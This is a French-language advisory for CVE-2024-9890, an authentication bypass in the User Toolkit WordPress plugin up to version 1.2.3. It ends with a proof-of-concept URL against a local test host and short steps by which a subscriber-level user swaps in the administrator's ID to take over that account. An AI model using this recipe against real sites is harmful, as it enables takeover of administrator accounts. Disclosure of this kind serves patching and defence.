
User Toolkit <= 1.2.3 - Contournement d'authentification par un utilisateur authentifié (Abonné+)
User Toolkit <= 1.2.3 - Contournement d'authentification pour utilisateurs authentifiés (Abonné+)
Le plugin User Toolkit pour WordPress est vulnérable au contournement d'authentification dans les versions jusqu'à 1.2.3 inclus. Cela est dû à une vérification de capacité incorrecte dans la fonction 'switchUser'. Cela permet à des attaquants authentifiés, disposant de permissions de niveau abonné ou supérieur, de se connecter en tant que n'importe quel utilisateur existant sur le site, tel qu'un administrateur.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
Connectez-vous avec votre utilisateur. Affichez la source de votre page de profil pour récupérer la valeur nonce. Modifiez la valeur user_from par votre identifiant utilisateur. Modifiez user_id par l'identifiant de l'admin. Terminé !